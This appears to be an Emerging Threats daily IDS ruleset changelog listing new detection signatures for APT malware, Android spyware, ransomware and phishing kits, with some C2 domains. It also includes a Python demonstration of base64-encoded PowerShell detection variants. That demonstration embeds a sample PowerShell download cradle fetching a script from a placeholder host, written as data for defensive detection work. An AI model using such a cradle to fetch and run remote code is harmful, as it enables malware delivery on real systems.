Daily Ruleset Update Summary 2017/02/16

[***] Summary: [***]

56 Open signatures, 76 new Pro (56 + 20). (?:Mini|Cosmic)Duke, MAGICHOUND, Satan Ransomware.

Thanks: @J0hnnyXm4s and @cyber_attacks.

[+++]          Added rules:          [+++]

2023909 - ET TROJAN Miniduke variant C&C activity (trojan.rules)
2023910 - ET TROJAN CosmicDuke Exfiltrating Data via FTP STOR (trojan.rules)
2023911 - ET TROJAN Miniduke variant FTP upload (trojan.rules)
2023912 - ET TROJAN APT28 SEDNIT Variant CnC Beacon 1 (trojan.rules)
2023913 - ET TROJAN APT28 SEDNIT Variant CnC Beacon 2 (trojan.rules)
2023914 - ET TROJAN APT28 SEDNIT Variant CnC Beacon 3 (trojan.rules)
2023915 - ET TROJAN APT28 SEDNIT Variant CnC Beacon 4 (trojan.rules)
2023916 - ET TROJAN APT28 Uploader Variant CnC Beacon (trojan.rules)
2023917 - ET TROJAN APT28 Uploader Variant Fake Request to Google (trojan.rules)
2023918 - ET TROJAN MiniDuke CnC Beacon (string1_slide_1_1) (trojan.rules)
2023919 - ET TROJAN MiniDuke CnC Beacon (string1_slide_1_2) (trojan.rules)
2023920 - ET TROJAN MiniDuke CnC Beacon (string1_slide_2_1) (trojan.rules)
2023921 - ET TROJAN MiniDuke CnC Beacon (string1_slide_2_2) (trojan.rules)
2023922 - ET TROJAN MiniDuke CnC Beacon (string1_slide_3_1) (trojan.rules)
2023923 - ET TROJAN MiniDuke CnC Beacon (string1_slide_3_2) (trojan.rules)
2023924 - ET TROJAN MiniDuke CnC Beacon (string2_slide_1_1) (trojan.rules)
2023925 - ET TROJAN MiniDuke CnC Beacon (string2_slide_1_2) (trojan.rules)
2023926 - ET TROJAN MiniDuke CnC Beacon (string2_slide_2_1) (trojan.rules)
2023927 - ET TROJAN MiniDuke CnC Beacon (string2_slide_2_2) (trojan.rules)
2023928 - ET TROJAN MiniDuke CnC Beacon (string2_slide_3_1) (trojan.rules)
2023929 - ET TROJAN MiniDuke CnC Beacon (string2_slide_3_2) (trojan.rules)
2023930 - ET TROJAN Miniduke Variant CnC Beacon via WebDAV (trojan.rules)
2023931 - ET TROJAN APT29 Cache_DLL SSL Cert (trojan.rules)
2023932 - ET TROJAN Qadars CnC DNS Lookup (zkdef09i7ola . net) (trojan.rules)
2023933 - ET MOBILE_MALWARE Trojan-Spy.AndroidOS.Femas.b CnC Beacon (mobile_malware.rules)
2023934 - ET MOBILE_MALWARE Trojan-Spy.AndroidOS.Femas.b Apps List Exfil (mobile_malware.rules)
2023935 - ET MOBILE_MALWARE Trojan-Spy.AndroidOS.Femas.b DNS Lookup (mobile_malware.rules)
2023936 - ET MOBILE_MALWARE Trojan-Spy.AndroidOS.Femas.b DNS Lookup (mobile_malware.rules)
2023937 - ET MOBILE_MALWARE Trojan-Spy.AndroidOS.Femas.b DNS Lookup (mobile_malware.rules)
2023938 - ET MOBILE_MALWARE Trojan-Spy.AndroidOS.Femas.b DNS Lookup (mobile_malware.rules)
2023939 - ET MOBILE_MALWARE Trojan-Spy.AndroidOS.Femas.b DNS Lookup (mobile_malware.rules)
2023940 - ET TROJAN MAGICHOUND.MPK Activity via IRC (trojan.rules)
2023941 - ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M1 (trojan.rules)
2023942 - ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M2 (trojan.rules)
2023943 - ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M3 (trojan.rules)
2023944 - ET TROJAN Possibly Malicious Double Base64 Unicode Net.ServicePointManager M1 (trojan.rules)
2023945 - ET TROJAN Possibly Malicious Double Base64 Unicode Net.ServicePointManager M2 (trojan.rules)
2023946 - ET TROJAN Possibly Malicious Double Base64 Unicode Net.ServicePointManager M3 (trojan.rules)
2023947 - ET TROJAN Possible Malicious PowerSploit PowerShell Script Observed over HTTP (trojan.rules)
2023948 - ET TROJAN MAGICHOUND.FETCH Retrieving Malicious PowerShell (trojan.rules)
2023949 - ET TROJAN Likely MAGICHOUND.FETCH Receiving PowerSploit PowerShell over HTTP (trojan.rules)
2023950 - ET TROJAN MAGICHOUND.RETRIEVER CnC Beacon (trojan.rules)
2023951 - ET TROJAN MAGICHOUND.FETCH CnC Beacon (trojan.rules)
2023952 - ET TROJAN MAGICHOUND.FETCH SSL Cert (trojan.rules)
2023953 - ET TROJAN MAGICHOUND-related DNS Lookup (chrome-up .date) (trojan.rules)
2023954 - ET TROJAN MAGICHOUND-related DNS Lookup (timezone .live) (trojan.rules)
2023955 - ET TROJAN MAGICHOUND-related DNS Lookup (servicesystem .serveirc.com) (trojan.rules)
2023956 - ET TROJAN MAGICHOUND-related DNS Lookup (analytics-google .org) (trojan.rules)
2023957 - ET TROJAN MAGICHOUND-related DNS Lookup (com-adm .in) (trojan.rules)
2023958 - ET TROJAN MAGICHOUND-related DNS Lookup (microsoftexplorerservices .cloud) (trojan.rules)
2023959 - ET TROJAN MAGICHOUND-related DNS Lookup (msservice .site) (trojan.rules)
2023960 - ET TROJAN MAGICHOUND-related DNS Lookup (com-ho .me) (trojan.rules)
2023961 - ET TROJAN MAGICHOUND-related DNS Lookup (ntg-sa .com) (trojan.rules)
2023962 - ET TROJAN MAGICHOUND-related DNS Lookup (briefl .ink) (trojan.rules)
2023963 - ET TROJAN MAGICHOUND.LEASH IRC CnC Beacon (trojan.rules)
2023964 - ET CURRENT_EVENTS Successful WeTransfer Phish Oct 04 2016 (current_events.rules)

Pro:

2824992 - ETPRO TROJAN Win32/Unknown Fake SSL CnC Beacon 3 (cipher suite) (trojan.rules)
2824993 - ETPRO TROJAN Win32/Unknown Fake SSL CnC Beacon 4 (ec_point_formats) (trojan.rules)
2824994 - ETPRO TROJAN Win32/Unknown Fake SSL CnC Beacon 5 (renegotiation_info/blank SNI ) (trojan.rules)
2824995 - ETPRO TROJAN Win32/Unknown Fake SSL CnC Beacon 6 (Server Hello pre-packet) (trojan.rules)
2824996 - ETPRO TROJAN Win32/Unknown Fake SSL CnC Beacon 7 (compress_method/blank SNI) (trojan.rules)
2824997 - ETPRO TROJAN Satan Ransomware .onion Proxy Domain (trojan.rules)
2824998 - ETPRO MOBILE_MALWARE PUA RiskTool.AndroidOS.Dnotua.oe Checkin (mobile_malware.rules)
2824999 - ETPRO MOBILE_MALWARE PUA RiskTool.AndroidOS.Dnotua.oe Checkin 2 (mobile_malware.rules)
2825000 - ETPRO CURRENT_EVENTS Observed Malicious SSL Cert (MalDoc Download) (current_events.rules)
2825001 - ETPRO CURRENT_EVENTS Successful My ADP Phish (set) Feb 16 2017 (current_events.rules)
2825002 - ETPRO CURRENT_EVENTS Successful My ADP Phish Feb 16 2017 (current_events.rules)
2825003 - ETPRO CURRENT_EVENTS Successful Bank of America Phish M1 Feb 16 2017 (current_events.rules)
2825004 - ETPRO CURRENT_EVENTS Successful Bank of America Phish M2 Feb 16 2017 (current_events.rules)
2825005 - ETPRO CURRENT_EVENTS Successful Bank of America Phish M3 Feb 16 2017 (current_events.rules)
2825006 - ETPRO MOBILE_MALWARE Android/Iop.DJ Checkin (mobile_malware.rules)
2825007 - ETPRO CURRENT_EVENTS Paypal Phishing Landing Feb 16 2017 (current_events.rules)
2825008 - ETPRO CURRENT_EVENTS Successful Paypal Phish M1 Feb 16 2017 (current_events.rules)
2825009 - ETPRO CURRENT_EVENTS Successful Paypal Phish M2 Feb 16 2017 (current_events.rules)
2825010 - ETPRO CURRENT_EVENTS Successful Generic Personalized Email Phish Feb 16 2017 (current_events.rules)
2825011 - ETPRO CURRENT_EVENTS Successful DHL Phish Feb 16 2017 (current_events.rules)
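The three "Base64 Unicode WebClient DownloadString" rules (M1, M2, M3) and the three "Double Base64 Unicode Net.ServicePointManager" rules are listed without an explanation of how the variants differ. The page does not say, and the rules' actual content matches are not reproduced here; the script below is an added example (not Emerging Threats' rule text) that assumes the usual reason for three variants: PowerShell -EncodedCommand is base64 over UTF-16LE ("Unicode") text, and base64 maps every 3 input bytes to 4 output characters, so a fixed substring has exactly three possible encodings depending on its byte offset mod 3. The sample command, the host name and the exact needle string are constructed for the demonstration.

```python
import base64
from typing import Optional

# Constructed sample of the kind of one-liner that -EncodedCommand carries.
# The host name is hypothetical, not an indicator from this ruleset.
SAMPLE_COMMAND = "(New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"

# Substring taken from the rule titles above; the real ET rules may key on
# a different span of text (assumption for the demo).
NEEDLE = "WebClient).DownloadString"


def stable_b64_variants(needle: bytes) -> list:
    """Return three base64 fragments, one per alignment (offset mod 3 of the
    needle inside the encoded buffer), each independent of the surrounding bytes.

    A 6-bit output group is kept only if it lies entirely inside the needle's
    bytes; groups that straddle a neighbouring byte depend on that byte and
    are dropped from the fragment."""
    variants = []
    n = len(needle)
    for k in range(3):
        # k filler bytes shift the needle to offset k; their value is irrelevant
        # because every group touching them is cut off below.
        enc = base64.b64encode(b"\x00" * k + needle).decode("ascii")
        start = (8 * k + 5) // 6       # first 6-bit group fully inside the needle
        end = (8 * k + 8 * n) // 6     # one past the last such group
        variants.append(enc[start:end])
    return variants


def unicode_variants(text: str) -> list:
    """Variants for text as PowerShell encodes it: UTF-16LE, then base64."""
    return stable_b64_variants(text.encode("utf-16-le"))


def match_variant(b64_blob: str, text: str) -> Optional[int]:
    """Return 1, 2 or 3 (M1/M2/M3 style: which alignment matched) or None."""
    for i, v in enumerate(unicode_variants(text), start=1):
        if v in b64_blob:
            return i
    return None


def encode_command(command: str) -> str:
    """What `powershell -EncodedCommand` expects: base64 of the UTF-16LE bytes."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def demo() -> dict:
    """Walk the needle through all three alignments by prepending 0, 1 or 2
    characters: each UTF-16LE character is 2 bytes, so the offset mod 3 changes
    with every added character. Returns {pad: matched variant}."""
    results = {}
    for pad in range(3):
        blob = encode_command(" " * pad + SAMPLE_COMMAND)
        results[pad] = match_variant(blob, NEEDLE)
    return results


if __name__ == "__main__":
    for i, v in enumerate(unicode_variants(NEEDLE), start=1):
        print(f"M{i}: {v}")
    print(demo())
```

Each printed fragment is what a single `content:` match would need to carry; a rule that only had one of them would miss two thirds of otherwise identical commands, which is why such signatures ship as M1/M2/M3. For the double-base64 case the same reasoning applies twice: every inner alignment is itself base64-encoded at one of three outer alignments, so a content-only approach needs more variants, or the engine's base64 decoding keyword is used instead.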

[///]     Modified active rules:     [///]

2023814 - ET TROJAN CryptoShield Ransomware Checkin (trojan.rules)
2821129 - ETPRO TROJAN Win32/Unknown Fake SSL CnC Beacon 1 (trojan.rules)
2821148 - ETPRO TROJAN Sharik/Smoke Checkin 2 (trojan.rules)
2823117 - ETPRO INFO DNS TXT Response Contains URL (info.rules)

[---]         Removed rules:         [---]

2808272 - ETPRO TROJAN Miniduke variant FTP upload (trojan.rules)
2808273 - ETPRO TROJAN Miniduke variant C&C activity (trojan.rules)
2812049 - ETPRO TROJAN CosmicDuke Exfiltrating Data via FTP STOR (trojan.rules)
2814358 - ETPRO TROJAN Win32/Slackbot.F Activity via IRC (trojan.rules)
2822374 - ETPRO CURRENT_EVENTS Successful WeTransfer Phish Oct 04 2016 (current_events.rules)

Date: Thursday, February 16, 2017 - 00:00